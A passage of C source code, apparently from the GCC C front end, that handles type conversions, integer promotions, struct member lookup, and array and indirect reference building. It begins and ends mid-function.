/* Convert in case a char is more than one unit. */
return size_binop_loc (input_location, CEIL_DIV_EXPR, TYPE_SIZE_UNIT (type),
size_int (TYPE_PRECISION (char_type_node)
/ BITS_PER_UNIT));
}
/* Return either DECL or its known constant value (if it has one). */
tree
decl_constant_value_1 (tree decl, bool in_init)
{
if (/* Note that DECL_INITIAL isn't valid for a PARM_DECL. */
TREE_CODE (decl) != PARM_DECL
&& !TREE_THIS_VOLATILE (decl)
&& TREE_READONLY (decl)
&& DECL_INITIAL (decl) != NULL_TREE
&& !error_operand_p (DECL_INITIAL (decl))
/* This is invalid if initial value is not constant.
If it has either a function call, a memory reference,
or a variable, then re-evaluating it could give different results. */
&& TREE_CONSTANT (DECL_INITIAL (decl))
/* Check for cases where this is sub-optimal, even though valid. */
&& (in_init || TREE_CODE (DECL_INITIAL (decl)) != CONSTRUCTOR))
return DECL_INITIAL (decl);
return decl;
}
/* Return either DECL or its known constant value (if it has one).
Like the above, but always return decl outside of functions. */
tree
decl_constant_value (tree decl)
{
/* Don't change a variable array bound or initial value to a constant
in a place where a variable is invalid. */
return current_function_decl ? decl_constant_value_1 (decl, false) : decl;
}
/* Convert the array expression EXP to a pointer. */
static tree
array_to_pointer_conversion (location_t loc, tree exp)
{
tree orig_exp = exp;
tree type = TREE_TYPE (exp);
tree adr;
tree restype = TREE_TYPE (type);
tree ptrtype;
gcc_assert (TREE_CODE (type) == ARRAY_TYPE);
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
ptrtype = build_pointer_type (restype);
if (INDIRECT_REF_P (exp))
return convert (ptrtype, TREE_OPERAND (exp, 0));
/* In C++ array compound literals are temporary objects unless they are
const or appear in namespace scope, so they are destroyed too soon
to use them for much of anything (c++/53220). */
if (warn_cxx_compat && TREE_CODE (exp) == COMPOUND_LITERAL_EXPR)
{
tree decl = TREE_OPERAND (TREE_OPERAND (exp, 0), 0);
if (!TREE_READONLY (decl) && !TREE_STATIC (decl))
warning_at (DECL_SOURCE_LOCATION (decl), OPT_Wc___compat,
"converting an array compound literal to a pointer "
"is ill-formed in C++");
}
adr = build_unary_op (loc, ADDR_EXPR, exp, true);
return convert (ptrtype, adr);
}
/* Convert the function expression EXP to a pointer. */
static tree
function_to_pointer_conversion (location_t loc, tree exp)
{
tree orig_exp = exp;
gcc_assert (TREE_CODE (TREE_TYPE (exp)) == FUNCTION_TYPE);
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
return build_unary_op (loc, ADDR_EXPR, exp, false);
}
/* Mark EXP as read, not just set, for set but not used -Wunused
warning purposes. */
void
mark_exp_read (tree exp)
{
switch (TREE_CODE (exp))
{
case VAR_DECL:
case PARM_DECL:
DECL_READ_P (exp) = 1;
break;
case ARRAY_REF:
case COMPONENT_REF:
case MODIFY_EXPR:
case REALPART_EXPR:
case IMAGPART_EXPR:
CASE_CONVERT:
case ADDR_EXPR:
case VIEW_CONVERT_EXPR:
mark_exp_read (TREE_OPERAND (exp, 0));
break;
case COMPOUND_EXPR:
/* Pattern match what build_atomic_assign produces with modifycode
NOP_EXPR. */
if (VAR_P (TREE_OPERAND (exp, 1))
&& DECL_ARTIFICIAL (TREE_OPERAND (exp, 1))
&& TREE_CODE (TREE_OPERAND (exp, 0)) == COMPOUND_EXPR)
{
tree t1 = TREE_OPERAND (TREE_OPERAND (exp, 0), 0);
tree t2 = TREE_OPERAND (TREE_OPERAND (exp, 0), 1);
if (TREE_CODE (t1) == TARGET_EXPR
&& TARGET_EXPR_SLOT (t1) == TREE_OPERAND (exp, 1)
&& TREE_CODE (t2) == CALL_EXPR)
{
tree fndecl = get_callee_fndecl (t2);
tree arg = NULL_TREE;
if (fndecl
&& TREE_CODE (fndecl) == FUNCTION_DECL
&& fndecl_built_in_p (fndecl, BUILT_IN_NORMAL)
&& call_expr_nargs (t2) >= 2)
switch (DECL_FUNCTION_CODE (fndecl))
{
case BUILT_IN_ATOMIC_STORE:
arg = CALL_EXPR_ARG (t2, 1);
break;
case BUILT_IN_ATOMIC_STORE_1:
case BUILT_IN_ATOMIC_STORE_2:
case BUILT_IN_ATOMIC_STORE_4:
case BUILT_IN_ATOMIC_STORE_8:
case BUILT_IN_ATOMIC_STORE_16:
arg = CALL_EXPR_ARG (t2, 0);
break;
default:
break;
}
if (arg)
{
STRIP_NOPS (arg);
if (TREE_CODE (arg) == ADDR_EXPR
&& DECL_P (TREE_OPERAND (arg, 0))
&& TYPE_ATOMIC (TREE_TYPE (TREE_OPERAND (arg, 0))))
mark_exp_read (TREE_OPERAND (arg, 0));
}
}
}
/* FALLTHRU */
case C_MAYBE_CONST_EXPR:
mark_exp_read (TREE_OPERAND (exp, 1));
break;
default:
break;
}
}
/* Perform the default conversion of arrays and functions to pointers.
Return the result of converting EXP. For any other expression, just
return EXP.
LOC is the location of the expression. */
struct c_expr
default_function_array_conversion (location_t loc, struct c_expr exp)
{
tree orig_exp = exp.value;
tree type = TREE_TYPE (exp.value);
enum tree_code code = TREE_CODE (type);
switch (code)
{
case ARRAY_TYPE:
{
bool not_lvalue = false;
bool lvalue_array_p;
while ((TREE_CODE (exp.value) == NON_LVALUE_EXPR
|| CONVERT_EXPR_P (exp.value))
&& TREE_TYPE (TREE_OPERAND (exp.value, 0)) == type)
{
if (TREE_CODE (exp.value) == NON_LVALUE_EXPR)
not_lvalue = true;
exp.value = TREE_OPERAND (exp.value, 0);
}
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp.value) = 1;
lvalue_array_p = !not_lvalue && lvalue_p (exp.value);
if (!flag_isoc99 && !lvalue_array_p)
{
/* Before C99, non-lvalue arrays do not decay to pointers.
Normally, using such an array would be invalid; but it can
be used correctly inside sizeof or as a statement expression.
Thus, do not give an error here; an error will result later. */
return exp;
}
exp.value = array_to_pointer_conversion (loc, exp.value);
}
break;
case FUNCTION_TYPE:
exp.value = function_to_pointer_conversion (loc, exp.value);
break;
default:
break;
}
return exp;
}
struct c_expr
default_function_array_read_conversion (location_t loc, struct c_expr exp)
{
mark_exp_read (exp.value);
return default_function_array_conversion (loc, exp);
}
/* Return whether EXPR should be treated as an atomic lvalue for the
purposes of load and store handling. */
static bool
really_atomic_lvalue (tree expr)
{
if (error_operand_p (expr))
return false;
if (!TYPE_ATOMIC (TREE_TYPE (expr)))
return false;
if (!lvalue_p (expr))
return false;
/* Ignore _Atomic on register variables, since their addresses can't
be taken so (a) atomicity is irrelevant and (b) the normal atomic
sequences wouldn't work. Ignore _Atomic on structures containing
bit-fields, since accessing elements of atomic structures or
unions is undefined behavior (C11 6.5.2.3#5), but it's unclear if
it's undefined at translation time or execution time, and the
normal atomic sequences again wouldn't work. */
while (handled_component_p (expr))
{
if (TREE_CODE (expr) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (expr, 1)))
return false;
expr = TREE_OPERAND (expr, 0);
}
if (DECL_P (expr) && C_DECL_REGISTER (expr))
return false;
return true;
}
/* Convert expression EXP (location LOC) from lvalue to rvalue,
including converting functions and arrays to pointers if CONVERT_P.
If READ_P, also mark the expression as having been read. */
struct c_expr
convert_lvalue_to_rvalue (location_t loc, struct c_expr exp,
bool convert_p, bool read_p)
{
if (read_p)
mark_exp_read (exp.value);
if (convert_p)
exp = default_function_array_conversion (loc, exp);
if (!VOID_TYPE_P (TREE_TYPE (exp.value)))
exp.value = require_complete_type (loc, exp.value);
if (really_atomic_lvalue (exp.value))
{
vec<tree, va_gc> *params;
tree nonatomic_type, tmp, tmp_addr, fndecl, func_call;
tree expr_type = TREE_TYPE (exp.value);
tree expr_addr = build_unary_op (loc, ADDR_EXPR, exp.value, false);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
gcc_assert (TYPE_ATOMIC (expr_type));
/* Expansion of a generic atomic load may require an addition
element, so allocate enough to prevent a resize. */
vec_alloc (params, 4);
/* Remove the qualifiers for the rest of the expressions and
create the VAL temp variable to hold the RHS. */
nonatomic_type = build_qualified_type (expr_type, TYPE_UNQUALIFIED);
tmp = create_tmp_var_raw (nonatomic_type);
tmp_addr = build_unary_op (loc, ADDR_EXPR, tmp, false);
TREE_ADDRESSABLE (tmp) = 1;
TREE_NO_WARNING (tmp) = 1;
/* Issue __atomic_load (&expr, &tmp, SEQ_CST); */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (expr_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
/* EXPR is always read. */
mark_exp_read (exp.value);
/* Return tmp which contains the value loaded. */
exp.value = build4 (TARGET_EXPR, nonatomic_type, tmp, func_call,
NULL_TREE, NULL_TREE);
}
return exp;
}
/* EXP is an expression of integer type. Apply the integer promotions
to it and return the promoted value. */
tree
perform_integral_promotions (tree exp)
{
tree type = TREE_TYPE (exp);
enum tree_code code = TREE_CODE (type);
gcc_assert (INTEGRAL_TYPE_P (type));
/* Normally convert enums to int,
but convert wide enums to something wider. */
if (code == ENUMERAL_TYPE)
{
type = c_common_type_for_size (MAX (TYPE_PRECISION (type),
TYPE_PRECISION (integer_type_node)),
((TYPE_PRECISION (type)
>= TYPE_PRECISION (integer_type_node))
&& TYPE_UNSIGNED (type)));
return convert (type, exp);
}
/* ??? This should no longer be needed now bit-fields have their
proper types. */
if (TREE_CODE (exp) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (exp, 1))
/* If it's thinner than an int, promote it like a
c_promoting_integer_type_p, otherwise leave it alone. */
&& compare_tree_int (DECL_SIZE (TREE_OPERAND (exp, 1)),
TYPE_PRECISION (integer_type_node)) < 0)
return convert (integer_type_node, exp);
if (c_promoting_integer_type_p (type))
{
/* Preserve unsignedness if not really getting any wider. */
if (TYPE_UNSIGNED (type)
&& TYPE_PRECISION (type) == TYPE_PRECISION (integer_type_node))
return convert (unsigned_type_node, exp);
return convert (integer_type_node, exp);
}
return exp;
}
/* Perform default promotions for C data used in expressions.
Enumeral types or short or char are converted to int.
In addition, manifest constants symbols are replaced by their values. */
tree
default_conversion (tree exp)
{
tree orig_exp;
tree type = TREE_TYPE (exp);
enum tree_code code = TREE_CODE (type);
tree promoted_type;
mark_exp_read (exp);
/* Functions and arrays have been converted during parsing. */
gcc_assert (code != FUNCTION_TYPE);
if (code == ARRAY_TYPE)
return exp;
/* Constants can be used directly unless they're not loadable. */
if (TREE_CODE (exp) == CONST_DECL)
exp = DECL_INITIAL (exp);
/* Strip no-op conversions. */
orig_exp = exp;
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
if (code == VOID_TYPE)
{
error_at (EXPR_LOC_OR_LOC (exp, input_location),
"void value not ignored as it ought to be");
return error_mark_node;
}
exp = require_complete_type (EXPR_LOC_OR_LOC (exp, input_location), exp);
if (exp == error_mark_node)
return error_mark_node;
promoted_type = targetm.promoted_type (type);
if (promoted_type)
return convert (promoted_type, exp);
if (INTEGRAL_TYPE_P (type))
return perform_integral_promotions (exp);
return exp;
}
/* Look up COMPONENT in a structure or union TYPE.
If the component name is not found, returns NULL_TREE. Otherwise,
the return value is a TREE_LIST, with each TREE_VALUE a FIELD_DECL
stepping down the chain to the component, which is in the last
TREE_VALUE of the list. Normally the list is of length one, but if
the component is embedded within (nested) anonymous structures or
unions, the list steps down the chain to the component. */
static tree
lookup_field (tree type, tree component)
{
tree field;
/* If TYPE_LANG_SPECIFIC is set, then it is a sorted array of pointers
to the field elements. Use a binary search on this array to quickly
find the element. Otherwise, do a linear search. TYPE_LANG_SPECIFIC
will always be set for structures which have many elements.
Duplicate field checking replaces duplicates with NULL_TREE so
TYPE_LANG_SPECIFIC arrays are potentially no longer sorted. In that
case just iterate using DECL_CHAIN. */
if (TYPE_LANG_SPECIFIC (type) && TYPE_LANG_SPECIFIC (type)->s
&& !seen_error ())
{
int bot, top, half;
tree *field_array = &TYPE_LANG_SPECIFIC (type)->s->elts[0];
field = TYPE_FIELDS (type);
bot = 0;
top = TYPE_LANG_SPECIFIC (type)->s->len;
while (top - bot > 1)
{
half = (top - bot + 1) >> 1;
field = field_array[bot+half];
if (DECL_NAME (field) == NULL_TREE)
{
/* Step through all anon unions in linear fashion. */
while (DECL_NAME (field_array[bot]) == NULL_TREE)
{
field = field_array[bot++];
if (RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
{
tree anon = lookup_field (TREE_TYPE (field), component);
if (anon)
return tree_cons (NULL_TREE, field, anon);
/* The Plan 9 compiler permits referring
directly to an anonymous struct/union field
using a typedef name. */
if (flag_plan9_extensions
&& TYPE_NAME (TREE_TYPE (field)) != NULL_TREE
&& (TREE_CODE (TYPE_NAME (TREE_TYPE (field)))
== TYPE_DECL)
&& (DECL_NAME (TYPE_NAME (TREE_TYPE (field)))
== component))
break;
}
}
/* Entire record is only anon unions. */
if (bot > top)
return NULL_TREE;
/* Restart the binary search, with new lower bound. */
continue;
}
if (DECL_NAME (field) == component)
break;
if (DECL_NAME (field) < component)
bot += half;
else
top = bot + half;
}
if (DECL_NAME (field_array[bot]) == component)
field = field_array[bot];
else if (DECL_NAME (field) != component)
return NULL_TREE;
}
else
{
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
{
if (DECL_NAME (field) == NULL_TREE
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
{
tree anon = lookup_field (TREE_TYPE (field), component);
if (anon)
return tree_cons (NULL_TREE, field, anon);
/* The Plan 9 compiler permits referring directly to an
anonymous struct/union field using a typedef
name. */
if (flag_plan9_extensions
&& TYPE_NAME (TREE_TYPE (field)) != NULL_TREE
&& TREE_CODE (TYPE_NAME (TREE_TYPE (field))) == TYPE_DECL
&& (DECL_NAME (TYPE_NAME (TREE_TYPE (field)))
== component))
break;
}
if (DECL_NAME (field) == component)
break;
}
if (field == NULL_TREE)
return NULL_TREE;
}
return tree_cons (NULL_TREE, field, NULL_TREE);
}
/* Recursively append candidate IDENTIFIER_NODEs to CANDIDATES. */
static void
lookup_field_fuzzy_find_candidates (tree type, tree component,
vec<tree> *candidates)
{
tree field;
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
{
if (DECL_NAME (field) == NULL_TREE
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
lookup_field_fuzzy_find_candidates (TREE_TYPE (field), component,
candidates);
if (DECL_NAME (field))
candidates->safe_push (DECL_NAME (field));
}
}
/* Like "lookup_field", but find the closest matching IDENTIFIER_NODE,
rather than returning a TREE_LIST for an exact match. */
static tree
lookup_field_fuzzy (tree type, tree component)
{
gcc_assert (TREE_CODE (component) == IDENTIFIER_NODE);
/* First, gather a list of candidates. */
auto_vec <tree> candidates;
lookup_field_fuzzy_find_candidates (type, component,
&candidates);
return find_closest_identifier (component, &candidates);
}
/* Support function for build_component_ref's error-handling.
Given DATUM_TYPE, and "DATUM.COMPONENT", where DATUM is *not* a
struct or union, should we suggest "DATUM->COMPONENT" as a hint? */
static bool
should_suggest_deref_p (tree datum_type)
{
/* We don't do it for Objective-C, since Objective-C 2.0 dot-syntax
allows "." for ptrs; we could be handling a failed attempt
to access a property. */
if (c_dialect_objc ())
return false;
/* Only suggest it for pointers... */
if (TREE_CODE (datum_type) != POINTER_TYPE)
return false;
/* ...to structs/unions. */
tree underlying_type = TREE_TYPE (datum_type);
enum tree_code code = TREE_CODE (underlying_type);
if (code == RECORD_TYPE || code == UNION_TYPE)
return true;
else
return false;
}
/* Make an expression to refer to the COMPONENT field of structure or
union value DATUM. COMPONENT is an IDENTIFIER_NODE. LOC is the
location of the COMPONENT_REF. COMPONENT_LOC is the location
of COMPONENT. */
tree
build_component_ref (location_t loc, tree datum, tree component,
location_t component_loc)
{
tree type = TREE_TYPE (datum);
enum tree_code code = TREE_CODE (type);
tree field = NULL;
tree ref;
bool datum_lvalue = lvalue_p (datum);
if (!objc_is_public (datum, component))
return error_mark_node;
/* Detect Objective-C property syntax object.property. */
if (c_dialect_objc ()
&& (ref = objc_maybe_build_component_ref (datum, component)))
return ref;
/* See if there is a field or component with name COMPONENT. */
if (code == RECORD_TYPE || code == UNION_TYPE)
{
if (!COMPLETE_TYPE_P (type))
{
c_incomplete_type_error (loc, NULL_TREE, type);
return error_mark_node;
}
field = lookup_field (type, component);
if (!field)
{
tree guessed_id = lookup_field_fuzzy (type, component);
if (guessed_id)
{
/* Attempt to provide a fixit replacement hint, if
we have a valid range for the component. */
location_t reported_loc
= (component_loc != UNKNOWN_LOCATION) ? component_loc : loc;
gcc_rich_location rich_loc (reported_loc);
if (component_loc != UNKNOWN_LOCATION)
rich_loc.add_fixit_misspelled_id (component_loc, guessed_id);
error_at (&rich_loc,
"%qT has no member named %qE; did you mean %qE?",
type, component, guessed_id);
}
else
error_at (loc, "%qT has no member named %qE", type, component);
return error_mark_node;
}
/* Accessing elements of atomic structures or unions is undefined
behavior (C11 6.5.2.3#5). */
if (TYPE_ATOMIC (type) && c_inhibit_evaluation_warnings == 0)
{
if (code == RECORD_TYPE)
warning_at (loc, 0, "accessing a member %qE of an atomic "
"structure %qE", component, datum);
else
warning_at (loc, 0, "accessing a member %qE of an atomic "
"union %qE", component, datum);
}
/* Chain the COMPONENT_REFs if necessary down to the FIELD.
This might be better solved in future the way the C++ front
end does it - by giving the anonymous entities each a
separate name and type, and then have build_component_ref
recursively call itself. We can't do that here. */
do
{
tree subdatum = TREE_VALUE (field);
int quals;
tree subtype;
bool use_datum_quals;
if (TREE_TYPE (subdatum) == error_mark_node)
return error_mark_node;
/* If this is an rvalue, it does not have qualifiers in C
standard terms and we must avoid propagating such
qualifiers down to a non-lvalue array that is then
converted to a pointer. */
use_datum_quals = (datum_lvalue
|| TREE_CODE (TREE_TYPE (subdatum)) != ARRAY_TYPE);
quals = TYPE_QUALS (strip_array_types (TREE_TYPE (subdatum)));
if (use_datum_quals)
quals |= TYPE_QUALS (TREE_TYPE (datum));
subtype = c_build_qualified_type (TREE_TYPE (subdatum), quals);
ref = build3 (COMPONENT_REF, subtype, datum, subdatum,
NULL_TREE);
SET_EXPR_LOCATION (ref, loc);
if (TREE_READONLY (subdatum)
|| (use_datum_quals && TREE_READONLY (datum)))
TREE_READONLY (ref) = 1;
if (TREE_THIS_VOLATILE (subdatum)
|| (use_datum_quals && TREE_THIS_VOLATILE (datum)))
TREE_THIS_VOLATILE (ref) = 1;
if (TREE_DEPRECATED (subdatum))
warn_deprecated_use (subdatum, NULL_TREE);
datum = ref;
field = TREE_CHAIN (field);
}
while (field);
return ref;
}
else if (should_suggest_deref_p (type))
{
/* Special-case the error message for "ptr.field" for the case
where the user has confused "." vs "->". */
rich_location richloc (line_table, loc);
/* "loc" should be the "." token. */
richloc.add_fixit_replace ("->");
error_at (&richloc,
"%qE is a pointer; did you mean to use %<->%>?",
datum);
return error_mark_node;
}
else if (code != ERROR_MARK)
error_at (loc,
"request for member %qE in something not a structure or union",
component);
return error_mark_node;
}
/* Given an expression PTR for a pointer, return an expression
for the value pointed to.
ERRORSTRING is the name of the operator to appear in error messages.
LOC is the location to use for the generated tree. */
tree
build_indirect_ref (location_t loc, tree ptr, ref_operator errstring)
{
tree pointer = default_conversion (ptr);
tree type = TREE_TYPE (pointer);
tree ref;
if (TREE_CODE (type) == POINTER_TYPE)
{
if (CONVERT_EXPR_P (pointer)
|| TREE_CODE (pointer) == VIEW_CONVERT_EXPR)
{
/* If a warning is issued, mark it to avoid duplicates from
the backend. This only needs to be done at
warn_strict_aliasing > 2. */
if (warn_strict_aliasing > 2)
if (strict_aliasing_warning (EXPR_LOCATION (pointer),
type, TREE_OPERAND (pointer, 0)))
TREE_NO_WARNING (pointer) = 1;
}
if (TREE_CODE (pointer) == ADDR_EXPR
&& (TREE_TYPE (TREE_OPERAND (pointer, 0))
== TREE_TYPE (type)))
{
ref = TREE_OPERAND (pointer, 0);
protected_set_expr_location (ref, loc);
return ref;
}
else
{
tree t = TREE_TYPE (type);
ref = build1 (INDIRECT_REF, t, pointer);
if (VOID_TYPE_P (t) && c_inhibit_evaluation_warnings == 0)
warning_at (loc, 0, "dereferencing %<void *%> pointer");
/* We *must* set TREE_READONLY when dereferencing a pointer to const,
so that we get the proper error message if the result is used
to assign to. Also, &* is supposed to be a no-op.
And ANSI C seems to specify that the type of the result
should be the const type. */
/* A de-reference of a pointer to const is not a const. It is valid
to change it via some other pointer. */
TREE_READONLY (ref) = TYPE_READONLY (t);
TREE_SIDE_EFFECTS (ref)
= TYPE_VOLATILE (t) || TREE_SIDE_EFFECTS (pointer);
TREE_THIS_VOLATILE (ref) = TYPE_VOLATILE (t);
protected_set_expr_location (ref, loc);
return ref;
}
}
else if (TREE_CODE (pointer) != ERROR_MARK)
invalid_indirection_error (loc, type, errstring);
return error_mark_node;
}
/* This handles expressions of the form "a[i]", which denotes
an array reference.
This is logically equivalent in C to *(a+i), but we may do it differently.
If A is a variable or a member, we generate a primitive ARRAY_REF.
This avoids forcing the array out of registers, and can work on
arrays that are not lvalues (for example, members of structures returned
by functions).
For vector types, allow vector[i] but not i[vector], and create
*(((type*)&vectortype) + i) for the expression.
LOC is the location to use for the returned expression. */
tree
build_array_ref (location_t loc, tree array, tree index)
{
tree ret;
bool swapped = false;
if (TREE_TYPE (array) == error_mark_node
|| TREE_TYPE (index) == error_mark_node)
return error_mark_node;
if (TREE_CODE (TREE_TYPE (array)) != ARRAY_TYPE
&& TREE_CODE (TREE_TYPE (array)) != POINTER_TYPE
/* Allow vector[index] but not index[vector]. */
&& !gnu_vector_type_p (TREE_TYPE (array)))
{
if (TREE_CODE (TREE_TYPE (index)) != ARRAY_TYPE
&& TREE_CODE (TREE_TYPE (index)) != POINTER_TYPE)
{
error_at (loc,
"subscripted value is neither array nor pointer nor vector");
return error_mark_node;
}
std::swap (array, index);
swapped = true;
}
if (!INTEGRAL_TYPE_P (TREE_TYPE (index)))
{
error_at (loc, "array subscript is not an integer");
return error_mark_node;
}
if (TREE_CODE (TREE_TYPE (TREE_TYPE (array))) == FUNCTION_TYPE)
{
error_at (loc, "subscripted value is pointer to function");
return error_mark_node;
}
/* ??? Existing practice has been to warn only when the char
index is syntactically the index, not for char[array]. */
if (!swapped)
warn_array_subscript_with_type_char (loc, index);
/* Apply default promotions *after* noticing character types. */
index = default_conversion (index);
if (index == error_mark_node)
return error_mark_node;
gcc_assert (TREE_CODE (TREE_TYPE (index)) == INTEGER_TYPE);
bool was_vector = VECTOR_TYPE_P (TREE_TYPE (array));
bool non_lvalue = convert_vector_to_array_for_subscript (loc, &array, index);
if (TREE_CODE (TREE_TYPE (array)) == ARRAY_TYPE)
{
tree rval, type;
/* An array that is indexed by a non-constant
cannot be stored in a register; we must be able to do
address arithmetic on its address.
Likewise an array of elements of variable size. */
if (TREE_CODE (index) != INTEGER_CST
|| (COMPLETE_TYPE_P (TREE_TYPE (TREE_TYPE (array)))
&& TREE_CODE (TYPE_SIZE (TREE_TYPE (TREE_TYPE (array)))) != INTEGER_CST))
{
if (!c_mark_addressable (array, true))
return error_mark_node;
}
/* An array that is indexed by a constant value which is not within
the array bounds cannot be stored in a register either; because we
would get a crash in store_bit_field/extract_bit_field when trying
to access a non-existent part of the register. */
if (TREE_CODE (index) == INTEGER_CST
&& TYPE_DOMAIN (TREE_TYPE (array))
&& !int_fits_type_p (index, TYPE_DOMAIN (TREE_TYPE (array))))
{
if (!c_mark_addressable (array))
return error_mark_node;
}
if ((pedantic || warn_c90_c99_compat)
&& ! was_vector)
{
tree foo = array;
while (TREE_CODE (foo) == COMPONENT_REF)
foo = TREE_OPERAND (foo, 0);
if (VAR_P (foo) && C_DECL_REGISTER (foo))
pedwarn (loc, OPT_Wpedantic,
"ISO C forbids subscripting %<register%> array");
else if (!lvalue_p (foo))
pedwarn_c90 (loc, OPT_Wpedantic,
"ISO C90 forbids subscripting non-lvalue "
"array");
}
type = TREE_TYPE (TREE_TYPE (array));
rval = build4 (ARRAY_REF, type, array, index, NULL_TREE, NULL_TREE);
/* Array ref is const/volatile if the array elements are
or if the array is. */
TREE_READONLY (rval)
|= (TYPE_READONLY (TREE_TYPE (TREE_TYPE (array)))
| TREE_READONLY (array));
TREE_SIDE_EFFECTS (rval)
|= (TYPE_VOLATILE (TREE_TYPE (TREE_TYPE (array)))
| TREE_SIDE_EFFECTS (array));
TREE_THIS_VOLATILE (rval)
|= (TYPE_VOLATILE (TREE_TYPE (TREE_TYPE (array)))
/* This was added by rms on 16 Nov 91.
It fixes vol struct foo *a; a->elts[1]
in an inline function.
Hope it doesn't break something else. */
| TREE_THIS_VOLATILE (array));
ret = require_complete_type (loc, rval);
protected_set_expr_location (ret, loc);
if (non_lvalue)
ret = non_lvalue_loc (loc, ret);
return ret;
}
else
{
tree ar = default_conversion (array);
if (ar == error_mark_node)
return ar;
gcc_assert (TREE_CODE (TREE_TYPE (ar)) == POINTER_TYPE);
gcc_assert (TREE_CODE (TREE_TYPE (TREE_TYPE (ar))) != FUNCTION_TYPE);
ret = build_indirect_ref (loc, build_binary_op (loc, PLUS_EXPR, ar,
index, false),
RO_ARRAY_INDEXING);
if (non_lvalue)
ret = non_lvalue_loc (loc, ret);
return ret;
}
}
/* Build an external reference to identifier ID. FUN indicates
whether this will be used for a function call. LOC is the source
location of the identifier. This sets *TYPE to the type of the
identifier, which is not the same as the type of the returned value
for CONST_DECLs defined as enum constants. If the type of the
identifier is not available, *TYPE is set to NULL. */
tree
build_external_ref (location_t loc, tree id, bool fun, tree *type)
{
tree ref;
tree decl = lookup_name (id);
/* In Objective-C, an instance variable (ivar) may be preferred to
whatever lookup_name() found. */
decl = objc_lookup_ivar (decl, id);
*type = NULL;
if (decl && decl != error_mark_node)
{
ref = decl;
*type = TREE_TYPE (ref);
}
else if (fun)
/* Implicit function declaration. */
ref = implicitly_declare (loc, id);
else if (decl == error_mark_node)
/* Don't complain about something that's already been
complained about. */
return error_mark_node;
else
{
undeclared_variable (loc, id);
return error_mark_node;
}
if (TREE_TYPE (ref) == error_mark_node)
return error_mark_node;
if (TREE_DEPRECATED (ref))
warn_deprecated_use (ref, NULL_TREE);
/* Recursive call does not count as usage. */
if (ref != current_function_decl)
{
TREE_USED (ref) = 1;
}
if (TREE_CODE (ref) == FUNCTION_DECL && !in_alignof)
{
if (!in_sizeof && !in_typeof)
C_DECL_USED (ref) = 1;
else if (DECL_INITIAL (ref) == NULL_TREE
&& DECL_EXTERNAL (ref)
&& !TREE_PUBLIC (ref))
record_maybe_used_decl (ref);
}
if (TREE_CODE (ref) == CONST_DECL)
{
used_types_insert (TREE_TYPE (ref));
if (warn_cxx_compat
&& TREE_CODE (TREE_TYPE (ref)) == ENUMERAL_TYPE
&& C_TYPE_DEFINED_IN_STRUCT (TREE_TYPE (ref)))
{
warning_at (loc, OPT_Wc___compat,
("enum constant defined in struct or union "
"is not visible in C++"));
inform (DECL_SOURCE_LOCATION (ref), "enum constant defined here");
}
ref = DECL_INITIAL (ref);
TREE_CONSTANT (ref) = 1;
}
else if (current_function_decl != NULL_TREE
&& !DECL_FILE_SCOPE_P (current_function_decl)
&& (VAR_OR_FUNCTION_DECL_P (ref)
|| TREE_CODE (ref) == PARM_DECL))
{
tree context = decl_function_context (ref);
if (context != NULL_TREE && context != current_function_decl)
DECL_NONLOCAL (ref) = 1;
}
/* C99 6.7.4p3: An inline definition of a function with external
linkage ... shall not contain a reference to an identifier with
internal linkage. */
else if (current_function_decl != NULL_TREE
&& DECL_DECLARED_INLINE_P (current_function_decl)
&& DECL_EXTERNAL (current_function_decl)
&& VAR_OR_FUNCTION_DECL_P (ref)
&& (!VAR_P (ref) || TREE_STATIC (ref))
&& ! TREE_PUBLIC (ref)
&& DECL_CONTEXT (ref) != current_function_decl)
record_inline_static (loc, current_function_decl, ref,
csi_internal);
return ref;
}
/* Record details of decls possibly used inside sizeof or typeof. */
struct maybe_used_decl
{
/* The decl. */
tree decl;
/* The level seen at (in_sizeof + in_typeof). */
int level;
/* The next one at this level or above, or NULL. */
struct maybe_used_decl *next;
};
static struct maybe_used_decl *maybe_used_decls;
/* Record that DECL, an undefined static function reference seen
inside sizeof or typeof, might be used if the operand of sizeof is
a VLA type or the operand of typeof is a variably modified
type. */
static void
record_maybe_used_decl (tree decl)
{
struct maybe_used_decl *t = XOBNEW (&parser_obstack, struct maybe_used_decl);
t->decl = decl;
t->level = in_sizeof + in_typeof;
t->next = maybe_used_decls;
maybe_used_decls = t;
}
/* Pop the stack of decls possibly used inside sizeof or typeof. If
USED is false, just discard them. If it is true, mark them used
(if no longer inside sizeof or typeof) or move them to the next
level up (if still inside sizeof or typeof). */
void
pop_maybe_used (bool used)
{
struct maybe_used_decl *p = maybe_used_decls;
int cur_level = in_sizeof + in_typeof;
while (p && p->level > cur_level)
{
if (used)
{
if (cur_level == 0)
C_DECL_USED (p->decl) = 1;
else
p->level = cur_level;
}
p = p->next;
}
if (!used || cur_level == 0)
maybe_used_decls = p;
}
/* Return the result of sizeof applied to EXPR. */
struct c_expr
c_expr_sizeof_expr (location_t loc, struct c_expr expr)
{
struct c_expr ret;
if (expr.value == error_mark_node)
{
ret.value = error_mark_node;
ret.original_code = ERROR_MARK;
ret.original_type = NULL;
pop_maybe_used (false);
}
else
{
bool expr_const_operands = true;
if (TREE_CODE (expr.value) == PARM_DECL
&& C_ARRAY_PARAMETER (expr.value))
{
auto_diagnostic_group d;
if (warning_at (loc, OPT_Wsizeof_array_argument,
"%<sizeof%> on array function parameter %qE will "
"return size of %qT", expr.value,
TREE_TYPE (expr.value)))
inform (DECL_SOURCE_LOCATION (expr.value), "declared here");
}
